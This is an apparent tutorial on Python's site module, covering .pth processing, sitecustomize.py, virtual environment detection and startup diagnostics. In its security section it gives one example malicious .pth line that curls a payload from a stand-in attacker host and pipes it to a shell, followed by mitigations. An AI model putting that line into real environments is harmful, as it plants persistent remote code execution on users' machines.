Python site Customization — Deep Dive

The site module’s startup sequence in detail

The site module’s main() function (called automatically unless -S is used) follows a precise sequence. Understanding each step helps debug import issues and configure Python deployments.

Step 1: Compute prefixes

The module determines two key directories:

  • sys.prefix — the installation prefix (e.g., /usr or the venv directory)
  • sys.exec_prefix — the prefix for platform-specific files (usually the same)

For virtual environments, site reads pyvenv.cfg to override these prefixes:

import sys
print(f"prefix: {sys.prefix}")
print(f"exec_prefix: {sys.exec_prefix}")
print(f"base_prefix: {sys.base_prefix}")  # Original prefix before venv

# In a venv, prefix != base_prefix
is_venv = sys.prefix != sys.base_prefix

Step 2: Build site-packages paths

Using the prefixes, site constructs the site-packages directories and calls addsitedir() for each:

import site

# The actual directories site added
print(site.getsitepackages())
# Example output for prefix /usr (varies by platform and distribution):
# ['/usr/lib/python3.11/site-packages']
# Debian/Ubuntu system Pythons report dist-packages directories instead
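
As a rough illustration of how a prefix turns into a site-packages path, the sketch below reproduces the common POSIX layout. The helper name posix_site_packages is hypothetical, and the real logic in site also accounts for sys.platlibdir, Windows layouts, and distribution patches, so treat this as an approximation rather than what site actually runs.

```python
import posixpath
import sys


def posix_site_packages(prefix, version=None):
    """Return the conventional POSIX site-packages path under a prefix.

    Hypothetical helper for illustration only: it ignores sys.platlibdir
    (for example lib64) and any distribution-specific changes.
    """
    major, minor = (version or sys.version_info)[:2]
    return posixpath.join(prefix, "lib", f"python{major}.{minor}", "site-packages")


print(posix_site_packages("/usr", (3, 11)))  # /usr/lib/python3.11/site-packages
```

Comparing this guess with site.getsitepackages() on a given machine is a quick way to spot a distribution that patches the layout.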

Step 3: Process .pth files

For each site directory, site scans for .pth files. The processing rules:

# Lines in .pth files are processed as follows:
# 1. Blank lines and lines starting with # are skipped
# 2. Lines starting with "import" followed by a space or tab are exec'd as Python code
# 3. All other lines are treated as directory paths to add to sys.path
#    (made absolute relative to the site directory; paths that do not
#    exist or are already on sys.path are skipped)
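
The rules above can be sketched as a small classifier. The function name classify_pth_line and its return labels are made up for this example; it only decides what would happen to a line and does not exec anything or touch sys.path.

```python
def classify_pth_line(line):
    """Classify one .pth line as 'skip', 'exec', or 'path'.

    Illustrative only: mirrors the documented rules, not site's full logic.
    """
    if line.startswith("#") or line.strip() == "":
        return "skip"
    # Only a leading "import" followed by a space or tab triggers execution.
    if line.startswith(("import ", "import\t")):
        return "exec"
    return "path"


for sample in ["# a comment", "", "import os; os.getcwd()", "./vendored", "importlib_extras"]:
    print(repr(sample), "->", classify_pth_line(sample))
```

Note that a directory whose name merely begins with "import" (such as importlib_extras) is still treated as a path, because the check requires whitespace after the keyword.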

This is how setuptools hooks into startup, through a .pth file. Its legacy easy-install.pth lists installed eggs as path lines:

# easy-install.pth (simplified)
./setuptools-68.0.0-py3.11.egg

And how coverage enables automatic startup:

# coverage.pth
import coverage; coverage.process_startup()

Building a production sitecustomize.py

A well-structured sitecustomize.py for a server deployment:

"""
sitecustomize.py — Global Python configuration for production servers.
Place it in any directory on sys.path, typically the system or venv site-packages.
"""
import sys
import os

# 1. Configure warnings
import warnings
if os.environ.get("PYTHON_ENV") == "production":
    # Suppress deprecation warnings in production
    warnings.filterwarnings("ignore", category=DeprecationWarning)
else:
    # Show all warnings in development
    warnings.filterwarnings("default")

# 2. Set up automatic error reporting
def _setup_error_reporting():
    try:
        import sentry_sdk
        dsn = os.environ.get("SENTRY_DSN")
        if dsn:
            sentry_sdk.init(dsn=dsn, traces_sample_rate=0.1)
    except ImportError:
        pass

_setup_error_reporting()

# 3. Default encoding: nothing to configure.
#    sys.setdefaultencoding() was a Python 2 hack; Python 3 removed it
#    and sys.getdefaultencoding() is always 'utf-8'.

# 4. Add custom CA certificates
cert_file = os.environ.get("CUSTOM_CA_BUNDLE")
if cert_file and os.path.exists(cert_file):
    os.environ.setdefault("REQUESTS_CA_BUNDLE", cert_file)
    os.environ.setdefault("SSL_CERT_FILE", cert_file)

# 5. Enable faulthandler for crash diagnostics
import faulthandler
if not faulthandler.is_enabled():
    faulthandler.enable()

The .pth file execution exploit and mitigation

Because .pth files can execute arbitrary Python code via import lines, they are a potential security concern. Any writable site-packages directory could be compromised:

# malicious.pth — would execute on every Python startup
import os; os.system("curl https://evil.com/payload | sh")

Mitigations:

  • Ensure site-packages directories are not world-writable
  • Audit .pth files in production: find /usr/lib/python3.* -name "*.pth" -exec cat {} \;
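  • Use python -S for security-sensitive scripts to skip .pth processing (this skips the site module entirely, so site-packages is not added to sys.path either)
  • Python 3.11 introduced -P (safe path), which stops Python from prepending the script’s directory or the current directory to sys.path; it does not affect .pth processing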
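
The audit step can also be done from Python. The sketch below lists only the lines that would be executed, which is usually what a reviewer cares about. The function name find_pth_import_lines is hypothetical, and the scan covers a single directory rather than a whole tree.

```python
import os


def find_pth_import_lines(directory):
    """Return (filename, line_number, text) for executable lines in .pth files.

    A minimal audit sketch: it reports lines, it does not judge them.
    """
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".pth"):
            continue
        path = os.path.join(directory, name)
        with open(path, encoding="utf-8", errors="replace") as handle:
            for lineno, line in enumerate(handle, 1):
                # Same trigger as site: "import" followed by a space or tab.
                if line.startswith(("import ", "import\t")):
                    findings.append((name, lineno, line.rstrip("\n")))
    return findings
```

A typical use would be to loop over site.getsitepackages() and print every finding, then compare the result against the .pth files you expect your packages to install.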

Virtual environment architecture

The pyvenv.cfg file is the key to how virtual environments work with site:

# pyvenv.cfg in a typical venv
home = /usr/bin
include-system-site-packages = false
version = 3.11.5
executable = /usr/bin/python3.11
command = /usr/bin/python3.11 -m venv /home/user/myproject/venv
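
The file format is simple enough to parse by hand: one key = value pair per line, split on the first equals sign. The sketch below assumes that format and uses a hypothetical function name, parse_pyvenv_cfg; it is not the parser site itself uses, only an approximation of it.

```python
def parse_pyvenv_cfg(text):
    """Parse pyvenv.cfg content into a dict with lower-cased keys."""
    config = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue  # no "=" on this line, nothing to record
        config[key.strip().lower()] = value.strip()
    return config


sample = """\
home = /usr/bin
include-system-site-packages = false
version = 3.11.5
"""
print(parse_pyvenv_cfg(sample))
```

Splitting on the first "=" only means values that themselves contain "=" are kept intact.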

The site module’s detection logic:

import os
import sys

def _detect_venv():
    """Simplified version of site's venv detection."""
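    # abspath, not realpath: a venv's python is usually a symlink, and
    # resolving it would land in the base installation and miss pyvenv.cfg
    exe_dir = os.path.dirname(os.path.abspath(sys.executable))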

    # Check for pyvenv.cfg in exe_dir or parent
    for candidate in [exe_dir, os.path.dirname(exe_dir)]:
        cfg = os.path.join(candidate, "pyvenv.cfg")
        if os.path.isfile(cfg):
            return cfg, candidate
    return None, None

When a venv is detected:

  1. sys.prefix and sys.exec_prefix are set to the venv directory
  2. The venv’s site-packages is used instead of the system one
  3. User site-packages is disabled when include-system-site-packages is false
  4. include-system-site-packages controls whether the base installation’s packages are visible
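
Items 2 and 4 above can be sketched as a function that decides which prefixes are searched for site-packages. The name site_search_prefixes is hypothetical, config is assumed to be a dict of pyvenv.cfg keys and values, and the default of "true" for a missing key is my understanding of CPython's behavior rather than something stated here.

```python
def site_search_prefixes(venv_dir, base_prefix, config):
    """Return the prefixes whose site-packages would be searched, in order.

    Simplified sketch: the venv always comes first, and the base
    installation is included only when the config allows it.
    """
    value = config.get("include-system-site-packages", "true")  # assumed default
    prefixes = [venv_dir]
    if value.lower() == "true":
        prefixes.append(base_prefix)
    return prefixes


print(site_search_prefixes("/home/user/myproject/venv", "/usr",
                           {"include-system-site-packages": "false"}))
```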

Custom .pth file patterns

Auto-configuring development environments

# dev-setup.pth — place in site-packages
# Adds the project source to sys.path for editable installs
/home/user/projects/my-library/src
import my_library._dev_setup; my_library._dev_setup.configure()
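
A setup script could generate the path line of such a file instead of having it written by hand. The sketch below is one way to do that. The function name write_path_pth is hypothetical, and it writes a path line only, deliberately leaving out any import line.

```python
import os


def write_path_pth(site_dir, name, source_dir):
    """Write a .pth file in site_dir that adds source_dir to sys.path."""
    if not name.endswith(".pth"):
        raise ValueError("site only processes files ending in .pth")
    pth_path = os.path.join(site_dir, name)
    with open(pth_path, "w", encoding="utf-8") as handle:
        # An absolute path avoids depending on where the .pth file lives.
        handle.write(os.path.abspath(source_dir) + "\n")
    return pth_path
```

The new entry only takes effect on the next interpreter start, or after calling site.addsitedir() on the directory in the running process.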

Monkey-patching at startup

# In a .pth file: import _patches; _patches.apply()
# _patches.py:
def apply():
    """Apply compatibility patches before any application code runs."""
    import ssl
    # Work around broken system OpenSSL
    if hasattr(ssl, '_create_unverified_context'):
        pass  # Example: configure SSL defaults

Measuring site import overhead

The site module adds measurable startup overhead. Profile it:

# Time startup with and without site
python -c "pass"           # With site (normal)
python -S -c "pass"        # Without site

# Detailed import timing
python -X importtime -c "import site"

# -X importtime is available on Python 3.7+; see all startup imports
python -X importtime -c "pass" 2>&1 | head -20

Overhead from site is typically around 5–15 ms on modern systems, though it varies with filesystem speed and the number of site directories and .pth files. For serverless environments (AWS Lambda, Google Cloud Functions) where cold start matters, this cost adds up once .pth file processing and sitecustomize.py are included.
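
The shell comparison above can be scripted so the numbers are repeatable. The sketch below takes the best of a few runs to reduce noise. The function name time_startup is hypothetical, and wall-clock timing of a subprocess includes process creation, so the difference between the two results is only an estimate of the site cost.

```python
import subprocess
import sys
import time


def time_startup(extra_args=(), runs=5):
    """Return the fastest wall-clock time (seconds) to start and exit Python."""
    best = float("inf")
    for _ in range(runs):
        start = time.perf_counter()
        subprocess.run([sys.executable, *extra_args, "-c", "pass"], check=True)
        best = min(best, time.perf_counter() - start)
    return best


if __name__ == "__main__":
    with_site = time_startup()
    without_site = time_startup(("-S",))
    print(f"with site:    {with_site * 1000:.1f} ms")
    print(f"without site: {without_site * 1000:.1f} ms")
```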

The PYTHONSTARTUP file

Separate from sitecustomize.py, the PYTHONSTARTUP environment variable points to a file that runs only in interactive mode:

# ~/.pythonstartup
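try:
    import readline
    import rlcompleter  # importing it registers the completer with readline
    readline.parse_and_bind("tab: complete")
except ImportError:
    pass  # readline is not available on every platform (e.g. Windows)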

# Add common imports for convenience
from pathlib import Path
from pprint import pprint
from collections import Counter, defaultdict

This does not use the site module directly but is part of the broader startup customization ecosystem.

site.addsitedir() internals

This function is the core mechanism for adding directories and processing their .pth files:

import site

# Programmatically add a new site directory at runtime
site.addsitedir("/opt/custom-packages")
# This:
# 1. Appends the directory to sys.path (if it is not already there)
# 2. Scans for .pth files in that directory (processed in alphabetical order)
# 3. Processes each .pth file (adding paths and running import lines)

One subtle behavior: addsitedir does not change the working directory. Instead, each path line in a .pth file is joined with the site directory, so relative paths resolve against the site directory rather than the process’s current directory.
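
The relative-path behavior is easy to confirm with a throwaway directory. The sketch below builds a temporary site directory containing a .pth file with a relative entry, calls site.addsitedir(), and reports what was added. The function name demo_relative_pth and the names vendored and demo.pth are made up for the demonstration.

```python
import os
import site
import sys
import tempfile


def demo_relative_pth():
    """Return (sitedir, entries that addsitedir appended to sys.path)."""
    with tempfile.TemporaryDirectory() as sitedir:
        os.mkdir(os.path.join(sitedir, "vendored"))
        with open(os.path.join(sitedir, "demo.pth"), "w", encoding="utf-8") as fh:
            fh.write("vendored\n")  # relative path line
        before = list(sys.path)
        site.addsitedir(sitedir)
        added = [p for p in sys.path if p not in before]
        sys.path[:] = before  # undo the change so the demo has no side effects
        return sitedir, added


if __name__ == "__main__":
    sitedir, added = demo_relative_pth()
    for entry in added:
        print(entry)
```

The second entry printed should be the vendored directory inside the temporary site directory, regardless of the current working directory.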

Diagnosing site problems

A systematic approach for when imports break:

import os
import sys
import site

def diagnose_site():
    print("=== Site Diagnosis ===")
    print(f"Python: {sys.version}")
    print(f"Executable: {sys.executable}")
    print(f"Prefix: {sys.prefix}")
    print(f"Base prefix: {sys.base_prefix}")
    print(f"In venv: {sys.prefix != sys.base_prefix}")
    print(f"User site enabled: {site.ENABLE_USER_SITE}")
    print(f"User site dir: {site.getusersitepackages()}")
    print("\nSite packages:")
    for p in site.getsitepackages():
        exists = "(exists)" if os.path.exists(p) else "(MISSING)"
        print(f"  {p} {exists}")
    print("\nsys.path:")
    for p in sys.path:
        print(f"  {p}")

diagnose_site()

The one thing to remember: The site module’s power lies in its .pth file processing and sitecustomize.py hooks — together they form the mechanism that pip, setuptools, virtual environments, and production deployment tools all rely on to configure Python’s import system before your application starts.

